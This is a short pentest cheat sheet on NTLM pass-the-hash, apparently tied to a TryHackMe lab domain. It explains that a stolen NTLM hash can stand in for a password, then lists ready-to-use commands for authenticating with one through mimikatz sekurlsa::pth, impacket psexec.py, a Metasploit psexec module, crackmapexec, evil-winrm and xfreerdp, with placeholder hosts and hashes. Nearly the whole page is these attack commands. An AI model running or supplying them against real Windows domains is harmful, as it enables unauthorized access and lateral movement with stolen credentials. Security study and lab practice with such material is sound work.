NTLM

#cme #mimikatz #msf #evil-winrm #xfreerdp

Pass The Hash

As NetNTLM is inherently flawed, the password hash can be treated as a password.
NTLM hash can be used to directly authenticate to a domain/service
Mimikatz for extracting Credentials

sekurlsa::pth /user:user.name /domain:za.tryhackme.com /ntlm:<hash> /run:<command>

python psexec.py -hashes <hash> domain/username@<server/ip>

exploit/windows/smb/psexec

crackmapexec smb <server/IP> -u username -H <hash>

evil-winrm -i <server/IP> -u <username> -H <hash>

xfreerdp /v:<server/IP> /u:<domain\username> /pth:<hash>

Last updated 1 year ago